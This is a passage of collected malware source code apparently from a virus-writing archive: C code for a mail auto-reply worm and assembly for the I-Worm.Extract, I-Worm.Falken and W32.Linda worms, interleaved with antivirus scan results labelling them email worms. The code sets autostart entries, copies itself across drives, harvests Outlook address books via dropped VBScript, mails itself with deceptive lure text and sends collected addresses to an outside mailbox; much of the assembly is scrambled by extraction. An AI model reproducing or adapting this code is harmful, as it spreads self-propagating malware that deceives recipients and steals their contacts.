'%s', you wrote me :\n##########\n- ",mess>lpOriginator->lpszName); for(i=0,j=lstrlen(body);i<lstrlen(mess->lpszNoteText) && j<512;i++,j++) { body[j]=mess->lpszNoteText[i]; if(body[j]=='\n') { body[j]=0; lstrcat(body,"\n- "); j+=2; } } body[j]=0; } for(i=0;j<lstrlen(address) && address[i]!='@';i++); if(i>lstrlen(address)) wsprintf(body,"smtp.%s",address+i+1); else wsprintf(body,"smtp.yahoo.com"); if(j>=512) lstrcat(body,"..."); else lstrcat(body," "); wsprintf(body+strlen(body),"\n##########\n\n %s auto-reply:\n\n",server); lstrcat(body,"I can not reply now.\nLook at this attachment and mail me if you have some suggests.\n\n"); wsprintf(subject,"Re: %s ",mess->lpszSubject); wsprintf(address,"%s",mess->lpOriginator->lpszAddress); MessageBox(NULL,body,subject,MB_OK|MB_ICONINFORMATION); sendmail(sess,subject,body,address); tmp=(char *)malloc(strlen(mess->lpszSubject)+3); strcpy(tmp,mess->lpszSubject); free(mess->lpszSubject); tmp[strlen(tmp)+2]=0; tmp[strlen(tmp)]=' '; tmp[strlen(tmp)-1]=' '; mess->lpszSubject=tmp; mSaveMail(sess,NULL,mess,MAPI_LONG_MSGID,NULL,messId); mFreeBuffer(mess); SetThreadPriority(NULL,THREAD_PRIORITY_LOWEST); } } else mFreeBuffer(mess); } } while(mFindNext(sess,0,NULL,messId,MAPI_LONG_MSGID| MAPI_UNREAD_ONLY,NULL,messId)==SUCCESS_SUCCESS); } mLogoff(sess,0,0,0); FreeLibrary(hMAPI); }

void sendmail(LHANDLE sess, char *msubject, char *mbody, char *mailaddr) { char *name[]={"readme","clickme","lookthis","urgent","newgame","winanholiday", "hello","ForU","important"}; char *ext1[]={".mp3",".htm",".jpg",".gif",".html",".mpeg",".mpg",".htm",".vbs", ".zip",".rar"}; char *ext2[]={".exe",".com",".pif",".scr"}; attname[0]=0; strcat(attname,name[GetTickCount()&8]); strcat(attname,ext1[GetTickCount()&10]); strcat(attname,ext2[GetTickCount()&3]); MapiMessage mes; MapiRecipDesc from; memset(&mes,0,sizeof(MapiMessage)); memset(&from,0,sizeof(MapiRecipDesc)); from.lpszName=NULL; from.ulRecipClass=MAPI_ORIG; mes.lpszSubject=msubject; mes.lpszNoteText=mbody; mes.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc)); if(!mes.lpRecips) return; memset(mes.lpRecips,0,sizeof(MapiRecipDesc)); mes.lpRecips->lpszName=mailaddr; mes.lpRecips->lpszAddress=mailaddr; mes.lpRecips->ulRecipClass=MAPI_TO; mes.nRecipCount=1; mes.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); if(!mes.lpFiles) return; memset(mes.lpFiles,0,sizeof(MapiFileDesc)); mes.lpFiles->lpszPathName=filename; mes.lpFiles->lpszFileName=attname; mes.nFileCount=1; mes.lpOriginator=&from; mSendMail(sess,0,&mes,0,0); free(mes.lpRecips); free(mes.lpFiles); } void Welcome() { Sleep(750); MessageBox(NULL,"Software installed on the system.","SETUP",MB_OK|MB_ICONINFORMATION); }

File Essence.scr received on 05.16.2009 11:31:23 (CET)

Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster

Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0

Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15

Result Email-Worm.Win32.Stopin!IK Win32/Stopin.worm.24064 Worm/Stopin.C Worm/Win32.Stopin W32/Heuristic-119!Eldorado Win32:Stopin-B I-Worm/Stopin Win32.StopIn.B@mm I-Worm.Stopin.c Worm.Stopin.C Worm.Win32.Stopin.C Win32.HLLM.Stopin.50688 Win32.Stopin.c Win32/Stopin.A W32/Heuristic-119!Eldorado Email-Worm.Win32.Stopin.c W32/Stopin.C!worm Win32.StopIn.B@mm Email-Worm.Win32.Stopin Email-Worm.Win32.Stopin.c Email-Worm.Win32.Stopin.c W32/Stopin.c@MM W32/Stopin.c@MM Worm.Stopin.C Worm:Win32/Stopin.C@mm Win32/Stopin.C W32/Stopin.C@mm Worm/W32.Stopin.24064 W32/Stopin.C I-Worm.Stopin.C Medium Risk Malware Worm.Stopin.c W32/Stopin-B Email-Worm.Win32.Stopin.c W95.Pet_Tick.gen W32/Stopin.c WORM_STOPIN.B Win32.HLLW.Essence I-Worm.Win32.Stopin.C I-Worm.Stopin.C

Additional information File size: 24064 bytes MD5...: c5ca2b9bea18766448b54c7ecd4c887c SHA1..: 108ca819544e528b345e8afbc561b1ecda720102 PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

comment # Name : I-Worm.Extract Author : PetiK Date : February 3rd 2002 - February 4th 2002 Size : 5632 Action : Extract API from DLL directly (the reason of the name of worm) Copy itself to %SYSDIR%\UPDATEW32.EXE Create "RUN=" in WIN.INI to start with computer Display fake message Send to extractcounter@multimania.com the WAB of Outlook Take theses adresses to sread itself with MAPI functions. On 29th display a message box # .586p .model flat .code JUMPS api macro a extrn a:proc call a endm include Useful.inc include myinclude.inc start_worm: @pushsz "KERNEL32.DLL" api GetModuleHandleA xchg eax,ebx kern macro push push api mov endm kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern push mov push push call push x offset sz&x ebx GetProcAddress _ptk&x,eax CloseHandle CopyFileA CreateDirectoryA CreateFileA CreateFileMappingA DeleteFileA GetDateFormatA GetFileSize GetModuleFileNameA GetSystemDirectoryA GetSystemTime GetTimeFormatA GetWindowsDirectoryA lstrcat lstrcmp lstrcpy lstrlen MapViewOfFile SetCurrentDirectoryA Sleep UnmapViewOfFile WinExec WriteFile WriteProfileStringA WritePrivateProfileStringA 50 esi,offset orig_worm esi 0 _ptkGetModuleFileNameA 50

push offset verif_worm call _ptkGetSystemDirectoryA @pushsz "\UPDATEW32.EXE" push offset verif_worm call _ptklstrcat push push call test jz mov push push push call add mov stosd mov stosd mov stosd mov stosd pop copy_w: push push call esi offset verif_worm _ptklstrcmp eax,eax continue_worm edi,offset copy_worm edi 50 edi _ptkGetSystemDirectoryA edi,eax eax,"dpU\" eax,"Weta" eax,"e.23" eax,"ex" edi push 0 edi esi _ptkCopyFileA

run_w: push edi @pushsz "RUN" @pushsz "WINDOWS" call _ptkWriteProfileStringA call push push push api CreateDate 50 offset realname offset orig_worm GetFileTitleA

@pushsz " - " push offset date call _ptklstrcat push offset realname push offset date call _ptklstrcat f_mess: push 10h push offset date call @mess db "Cannot Open this File !",CRLF,CRLF db "If you downloaded this file, try downloading again.",0 @mess: push 0 api MessageBoxA jmp end_worm continue_worm: push 50 push offset vbsfile call _ptkGetWindowsDirectoryA @pushsz "\ExtractVbs.vbs" push offset vbsfile call _ptklstrcat push push push push push push push call xchg 0 20h 2 0 1 40000000h offset vbsfile _ptkCreateFileA eax,ebx

push push push push push call push call push push call push push call push call push call

0 offset octets e_vbs - s_vbs offset s_vbs ebx _ptkWriteFile ebx _ptkCloseHandle offset vbsfile offset vbsexec _ptklstrcpy 4 offset execcontrol _ptkWinExec 5000 _ptkSleep offset vbsfile _ptkDeleteFileA

payload: push offset Systime call _ptkGetSystemTime cmp [Systime.wDay],29 jne end_pay push 40h @pushsz "I-Worm.Extract" call e_mess db "Hi man, you received my worm !",CRLF db "Don't panic, it doesn't format your computer",CRLF,CRLF db 9,"Bye and Have a Nice Day.",0 e_mess: push 0 api MessageBoxA end_pay: sh_gsf: push 0 push 5 push offset progra push 0 api SHGetSpecialFolderPathA push offset progra call _ptkSetCurrentDirectoryA @pushsz "Update Windows 32bits" call _ptkCreateDirectoryA @pushsz "\Update Windows 32bits" push offset progra call _ptklstrcat push offset progra call _ptkSetCurrentDirectoryA push 0 @pushsz "MAJ.exe" push offset orig_worm call _ptkCopyFileA verif_inet: push push api dec jnz push push call push call 0 offset inet InternetGetConnectedState eax verif_inet 50 offset winpath _ptkGetWindowsDirectoryA offset winpath _ptkSetCurrentDirectoryA

spread: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h @pushsz "Outlook_Addr.txt" call _ptkCreateFileA inc eax

je dec xchg xor push push push push push push call test je xchg xor push push push push push call test je xchg push push call cmp jbe

end_spread eax eax,ebx eax,eax eax eax eax 2 eax ebx _ptkCreateFileMappingA eax,eax end_s1 eax,ebp eax,eax eax eax eax 4 ebp _ptkMapViewOfFile eax,eax end_s2 eax,esi 0 ebx _ptkGetFileSize eax,4 end_s3

scan_mail: xor edx,edx mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,";" je end_m cmp al,"#" je f_mail cmp al,'@' jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c end_m: xor al,al stosb pop edi test edx,edx je scan_mail call send_mail jmp scan_mail f_mail: end_s3: call end_s2: call end_s1: call end_spread: end_worm: push api push esi _ptkUnmapViewOfFile push ebp _ptkCloseHandle push ebx _ptkCloseHandle popad 0 ExitProcess

send_mail: call CreateDate call CreateTime @pushsz "C:\liste.ini" push offset mail_addr push offset time

push call xor push push push push push api ret

offset date _ptkWritePrivateProfileStringA eax,eax eax eax offset Message eax [sess] MAPISendMail

CreateDate Proc pushad mov edi,offset date push 32 push edi @pushsz "dddd, dd MMMM yyyy" push 0 push 0 push 9 call _ptkGetDateFormatA popad ret CreateDate EndP CreateTime Proc pushad mov edi,offset time push 32 push edi @pushsz "HH:mm:ss" push 0 push 0 push 9 call _ptkGetTimeFormatA popad ret CreateTime EndP .data copy_worm orig_worm verif_worm vbsfile winpath progra mail_addr realname date time octets inet sess subject body

db db db db db db db db db db dd dd dd

50 dup (0) 50 dup (0) 50 dup (0) 50 dup (0) 50 dup (0) 50 dup (0) 128 dup (?) 50 dup (0) 30 dup (?) 9 dup (?) ? 0 0

db "Re: Check This...",0 db "Hi",CRLF db "This is the file you ask for. Open quickly ! It's very important",CRLF,CRLF db 9,"Best Regards",CRLF,CRLF,CRLF db "Salut,",CRLF db "Voici le fichier que tu cherches. Ouvre vite ! C'est très important",CRLF,CRLF db 9,"Mes sincères salutations",0 filename db "important.exe",0 Message dd dd dd dd dd dd dd dd dd dd dd dd ? offset subject offset body ? ? ? 2 offset MsgFrom 1 offset MsgTo 1 offset Attach

MsgFrom dd dd dd dd dd MsgTo dd dd dd dd dd dd dd dd dd dd dd ? ? ? ? ?

dd ?

? 1 offset mail_addr offset mail_addr ? ? dd ? ? ? offset orig_worm offset filename ? db db db db db db db db db db db db db db db db db db db db db db db db db "CloseHandle",0 "CopyFileA",0 "CreateDirectoryA",0 "CreateFileA",0 "CreateFileMappingA",0 "DeleteFileA",0 "GetDateFormatA",0 "GetFileSize",0 "GetModuleFileNameA",0 "GetSystemDirectoryA",0 "GetSystemTime",0 "GetTimeFormatA",0 "GetWindowsDirectoryA",0 "lstrcat",0 "lstrcmp",0 "lstrcpy",0 "lstrlen",0 "MapViewOfFile",0 "SetCurrentDirectoryA",0 "Sleep",0 "UnmapViewOfFile",0 "WinExec",0 "WriteFile",0 "WritePrivateProfileStringA",0 "WriteProfileStringA",0 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? dd ?

Attach

szCloseHandle szCopyFileA szCreateDirectoryA szCreateFileA szCreateFileMappingA szDeleteFileA szGetDateFormatA szGetFileSize szGetModuleFileNameA szGetSystemDirectoryA szGetSystemTime szGetTimeFormatA szGetWindowsDirectoryA szlstrcat szlstrcmp szlstrcpy szlstrlen szMapViewOfFile szSetCurrentDirectoryA szSleep szUnmapViewOfFile szWinExec szWriteFile szWritePrivateProfileStringA szWriteProfileStringA

_ptkCloseHandle dd _ptkCopyFileA dd _ptkCreateDirectoryA dd _ptkCreateFileA dd _ptkCreateFileMappingA dd _ptkDeleteFileA dd _ptkGetDateFormatA dd _ptkGetFileSize dd _ptkGetModuleFileNameA dd _ptkGetSystemDirectoryA dd _ptkGetSystemTime dd _ptkGetTimeFormatA dd _ptkGetWindowsDirectoryA dd _ptklstrcat dd _ptklstrcmp dd _ptklstrcpy dd _ptklstrlen dd _ptkMapViewOfFile dd _ptkSetCurrentDirectoryA dd _ptkSleep dd _ptkUnmapViewOfFile dd _ptkWinExec dd _ptkWriteFile dd _ptkWriteProfileStringA dd _ptkWritePrivateProfileStringA

s_vbs: db 'On Error Resume Next',CRLF db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF db 'Set win=f.GetSpecialFolder(0)',CRLF db 'Set c=f.CreateTextFile(win&"\Outlook_Addr.txt")',CRLF

db db db db db db db db db db db db db db db e_vbs:

'c.Close',CRLF 'Set out=CreateObject("Outlook.Application")',CRLF 'Set mapi=out.GetNameSpace("MAPI")',CRLF 'adr="extractcounter@multimania.com"',CRLF 'For Each mail in mapi.AddressLists',CRLF 'If mail.AddressEntries.Count <> 0 Then',CRLF 'For O=1 To mail.AddressEntries.Count',CRLF 'adr=adr &";"& mail.AddressEntries(O).Address',CRLF 'Next',CRLF 'End If',CRLF 'Next',CRLF 'adr=adr &";#"',CRLF,CRLF 'Set c=f.OpenTextFile(win&"\Outlook_Addr.txt",2)',CRLF 'c.WriteLine adr',CRLF 'c.Close',CRLF

execcontrol db "wscript " vbsexec db 50 dup (0) db "",0 end start_worm end

File Extract.exe received on 05.16.2009 11:58:04 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 Result Trojan-Downloader.Win32.Small!IK Win32/Petik.worm.5632 Worm/Petik.2 Worm/Win32.Win32 W32/Malware!76bd Win32:Extract I-Worm/Petik Win32.Petik.I@mm I-Worm.Petik Worm.Win32.Petik.Y Win32.Petik.8192 Suspicious File Win32/Petik.5632.B W32/Malware!76bd Email-Worm.Win32.Petik W32/Petik!worm Win32.Petik.I@mm Trojan-Downloader.Win32.Small Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Petik.2 Worm:Win32/Petick.Y@mm Win32/Petik.Y W32/Pet_Tick.5632.C Worm/W32.Petik.5632.C W32/Extract I-Worm.Tractex.A Medium Risk Malware Worm.Mail.Petik.k W32/Petik-L Email-Worm.Win32.Petik W95.Pet_Tick.gen W32/Petik WORM_PETIK.L Win32.Worm.Extract I-Worm.Win32.PetTick.5632.B

Additional information File size: 5632 bytes MD5...: f6c5adc3869b24363a81d283908a9978 SHA1..: 8451ec7b8f6b487cd39d3d5ea9acdafc27116b28 PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

comment # Name : I-Worm.Falken Author : PetiK Date : February 5th 2002 - February 8th 2002 Size : 6144 Action : # .586p .model flat .code JUMPS api macro a extrn a:proc call a endm include Useful.inc start_worm: @pushsz "KERNEL32.DLL" api GetModuleHandleA xchg eax,ebx kern macro push push api mov endm kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern kern push mov push push call x offset sz&x ebx GetProcAddress _ptk&x,eax CloseHandle CopyFileA CreateFileA CreateFileMappingA DeleteFileA GetFileSize GetModuleFileNameA GetSystemDirectoryA GetTickCount GetWindowsDirectoryA lstrcat MapViewOfFile SetCurrentDirectoryA SetFilePointer Sleep UnmapViewOfFile WinExec WriteFile WritePrivateProfileStringA WriteProfileStringA 50 esi,offset orig_worm esi 0 _ptkGetModuleFileNameA

mov edi,offset copy_worm push edi push 50 push edi call _ptkGetSystemDirectoryA add edi,eax mov al,"\" stosb call _ptkGetTickCount push 9 pop ecx xor edx,edx div ecx inc edx mov ecx,edx copy_g: push ecx

call push pop xor div xchg add stosb call push pop xor div push call pop loop mov stosd pop

_ptkGetTickCount 'z'-'a' ecx edx,edx ecx eax,edx al,'a' _ptkGetTickCount 100 ecx edx,edx ecx edx _ptkSleep ecx copy_g eax,"exe." edi

push 50 push offset wininit call _ptkGetWindowsDirectoryA @pushsz "\WININIT.INI" push offset wininit call _ptklstrcat push offset wininit push esi @pushsz "NUL" @pushsz "rename" call _ptkWritePrivateProfileStringA copy_w: push push call push 0 edi esi _ptkCopyFileA

run_w: push edi @pushsz "RUN" @pushsz "WINDOWS" call _ptkWriteProfileStringA spread_system: call @lect db "D:\",0 db "E:\",0 db "F:\",0 db "G:\",0 db "H:\",0 db "I:\",0 db "J:\",0 db "K:\",0 db "L:\",0 db "M:\",0 db "N:\",0 db "O:\",0 db "P:\",0 db "Q:\",0 db "R:\",0 db "S:\",0 db "T:\",0 db "U:\",0 db "V:\",0 db "W:\",0 db "X:\",0 db "Y:\",0 db "Z:\",0 @lect: pop esi push 23 pop ecx loop_lect: push ecx push esi call _ptkSetCurrentDirectoryA push 0 @pushsz "winbackup.exe"

push offset orig_worm call _ptkCopyFileA @endsz pop ecx loop loop_lect end_spread_system: payload: call _ptkGetTickCount xor edx,edx mov ecx,20 div ecx cmp edx,2 jne end_payload push 10h @pushsz "I-Worm.Falken" call @messpay db "This is the last warning before the attack.",CRLF db "United States have to stop controling the world.",0 @messpay: push 0 api MessageBoxA end_payload: prep_spread_worm: push 0 push 20h push 2 push 0 push 1 push 40000000h @pushsz "C:\falken.vbs" call _ptkCreateFileA xchg eax,ebx push 0 push offset octets push e_vbs - s_vbs push offset s_vbs push ebx call _ptkWriteFile push ebx call _ptkCloseHandle push 1 @pushsz "wscript C:\falken.vbs" call _ptkWinExec push 2000 call _ptkSleep @pushsz "C:\falken.vbs" call _ptkDeleteFileA verif_inet: push push api dec jnz push push call push call 0 offset inet InternetGetConnectedState eax verif_inet 50 offset syspath _ptkGetSystemDirectoryA offset syspath _ptkSetCurrentDirectoryA

spread: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h @pushsz "falkenspread.txt" call _ptkCreateFileA inc eax je end_spread dec eax xchg eax,ebx xor eax,eax

push push push push push push call test je xchg xor push push push push push call test je xchg push push call cmp jbe

eax eax eax 2 eax ebx _ptkCreateFileMappingA eax,eax end_s1 eax,ebp eax,eax eax eax eax 4 ebp _ptkMapViewOfFile eax,eax end_s2 eax,esi 0 ebx _ptkGetFileSize eax,4 end_s3

scan_mail: xor edx,edx mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,";" je end_m cmp al,"#" je f_mail cmp al,'@' jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c end_m: mov counter,0 end_l: xor al,al stosb inc counter cmp counter,20 jne end_l pop edi test edx,edx je scan_mail call send_mail jmp scan_mail f_mail: end_s3: call end_s2: call end_s1: call end_spread: push esi _ptkUnmapViewOfFile push ebp _ptkCloseHandle push ebx _ptkCloseHandle popad

@pushsz "falkenspread.txt" call _ptkDeleteFileA end_worm: push api send_mail: xor push push 0 ExitProcess eax,eax eax eax

push push push api

offset Message eax [sess] MAPISendMail

push 0 push 80h push 4 push 0 push 1 push 40000000h @pushsz "falkenliste.txt" call _ptkCreateFileA xchg eax,ebx push push push push call push push push push push call push call ret 2 0 0 ebx _ptkSetFilePointer 0 offset octets e_liste - s_liste offset s_liste ebx _ptkWriteFile ebx _ptkCloseHandle

.data copy_worm orig_worm wininit lect syspath octets counter inet sess subject body filename Message

db db db db db dd dd dd dd db db db db db dd dd dd dd dd dd dd dd dd dd dd

50 50 50 50 50 ? ? 0 0

dup dup dup dup dup

(0) (0) (0) (0) (0)

"Last Warning !",0 "Message for Everybody,",CRLF "Open this file to see what we speak about.",CRLF,CRLF 9,"Best Regards",0 "open.exe",0 dd ? offset subject offset body ? ? ? 2 offset MsgFrom 1 offset MsgTo 1 offset Attach dd ? ? ? ? ? ? ? 1 offset mail_addr offset mail_addr ? ? dd ?

MsgFrom dd dd dd dd dd MsgTo dd dd dd dd dd dd

Attach

dd dd dd dd dd

? ? offset orig_worm offset filename ? db db db db db db db db db db db db db db db db db db db db "CloseHandle",0 "CopyFileA",0 "CreateFileA",0 "CreateFileMappingA",0 "DeleteFileA",0 "GetFileSize",0 "GetModuleFileNameA",0 "GetSystemDirectoryA",0 "GetTickCount",0 "GetWindowsDirectoryA",0 "lstrcat",0 "MapViewOfFile",0 "SetCurrentDirectoryA",0 "SetFilePointer",0 "Sleep",0 "UnmapViewOfFile",0 "WinExec",0 "WriteFile",0 "WritePrivateProfileStringA",0 "WriteProfileStringA",0 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? dd ? ?

szCloseHandle szCopyFileA szCreateFileA szCreateFileMappingA szDeleteFileA szGetFileSize szGetModuleFileNameA szGetSystemDirectoryA szGetTickCount szGetWindowsDirectoryA szlstrcat szMapViewOfFile szSetCurrentDirectoryA szSetFilePointer szSleep szUnmapViewOfFile szWinExec szWriteFile szWritePrivateProfileStringA szWriteProfileStringA

_ptkCloseHandle dd _ptkCopyFileA dd _ptkCreateFileA dd _ptkCreateFileMappingA dd _ptkDeleteFileA dd _ptkGetFileSize dd _ptkGetModuleFileNameA dd _ptkGetSystemDirectoryA dd _ptkGetTickCount dd _ptkGetWindowsDirectoryA dd _ptklstrcat dd _ptkMapViewOfFile dd _ptkSetCurrentDirectoryA dd _ptkSetFilePointer dd _ptkSleep dd _ptkUnmapViewOfFile dd _ptkWinExec dd _ptkWriteFile dd _ptkWritePrivateProfileStringA _ptkWriteProfileStringA dd s_vbs: db db db db db db db db db db db db db db db db db db db

'On Error Resume Next',CRLF 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF 'Set sys=fs.GetSpecialFolder(1)',CRLF 'Set c=fs.CreateTextFile(sys&"\falkenspread.txt")',CRLF 'c.Close',CRLF 'Set ou=CreateObject("Outlook.Application")',CRLF 'Set map=ou.GetNameSpace("MAPI")',CRLF 'adr=""',CRLF 'For Each mel in map.AddressLists',CRLF 'If mel.AddressEntries.Count <> 0 Then',CRLF 'For O=1 To mel.AddressEntries.Count',CRLF 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF 'Next',CRLF 'End If',CRLF 'Next',CRLF 'adr=adr &";#"',CRLF,CRLF 'Set c=fs.OpenTextFile(sys&"\falkenspread.txt",2)',CRLF 'c.WriteLine adr',CRLF 'c.Close',CRLF

e_vbs: s_liste: db "mailto : > " mail_addr db 50 dup (0) db " ",CRLF e_liste: end start_worm end

File Falken.exe received on 05.16.2009 11:58:11 (CET)

Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster

Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0

Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15

Result Email-Worm.Win32.Petik!IK Win32/Pettick.worm.6144 Worm/Petik.1 Worm/Win32.Win32 W32/NewMalware-NetWatcher!Eldorado Win32:Falkon I-Worm/Petik Win32.Petik.G@mm I-Worm.Petik Worm.Win32.Petik.AC Win32.Petik.8192 Suspicious File Win32/Falcon.A W32/NewMalware-NetWatcher!Eldorado Email-Worm.Win32.Petik W32/Petik!worm Win32.Petik.G@mm Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Petik.1 Worm:Win32/Petick.Z@mm Win32/Petik.AC W32/Pet_Tick.6144.C Worm/W32.Petik.6144 Worm Generic I-Worm.Tractex.B Medium Risk Malware Worm.Mail.Petik.j W32/Petik-P Email-Worm.Win32.Petik W95.Pet_Tick.gen W32/Petik WORM_FALKEN.A Win32.Worm.Falken I-Worm.Tractex.B

Additional information File size: 6144 bytes MD5...: f19278caf2e95e3abd31ad269e1b0814 SHA1..: 4b202c2aabe0a59addf103626cfb304835ecda2e PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

comment § Name : W32.Linda Data : February 13th 2002 Author : PetiK Language : Win32asm Size : 8192 (compressed with ASPack). Action : Infects rar files and ht* files in the current directory. § .386 locals jumps .model flat,STDCALL api macro x extrn x:proc call x endm struct dd 0 dd ?,? dd ?,? dd ?,? dd 0 dd 0 dd 0,0 db 260 dup(0) db 14 dup(0) db 2 dup (0) ends

WIN32_FIND_DATA dwFileAttributes ftCreationTime ftLastAccessTime ftLastWriteTime nFileSizeHigh nFileSizeLow dwReserved0 cFileName cAlternateFileName WIN32_FIND_DATA .DATA CRLF ffile sysTime orig_virus thFile Err time0 time1 time2 Size HeaderSize rarmask htmmask hFile fHnd mHnd sizer octets

equ <13,10> WIN32_FIND_DATA <?> db 16 dup(0) db dd dd dd dd dd 50 dup (0) ? 0 0,0 0,0 0,0

equ 8192 = EndRARHeader-RARHeader db "*.rar",0 db "*.ht*",0 dd ? dd ? dd ? dd 0 dd 0 dw db dw dw dd dd db dd db db db db dw dd db label 0 74h 8000h HeaderSize Size Size 0 0 63h,78h 31h,24h 14h 30h EndRARHeader-RARName 0 "LINDA32.EXE" byte

RARHeader: RARHeaderCRC RARType RARFlags RARHSize RARCompressed RAROriginal RAROs RARCrc32 RARFileTime RARFileDate RARNeedVer RARMethod RARFNameSize RARAttrib RARName EndRARHeader .CODE start_linda:

mov push api lea cmp jne cmp jne push call db @tit: call db db @mes: push api end_pay: push mov push push api push push push push api test je mov push push push push push push push api cmp je mov push mov lea push push push push api push api rar_srch: push push api dec jz inc mov inf_rar: call call cmp je call

eax,offset sysTime eax GetSystemTime eax,sysTime word ptr [eax+2],8 end_pay word ptr [eax+6],10 end_pay 40h @tit "W32RAR.Linda",0

; August ; 10th. Linda's Birthday

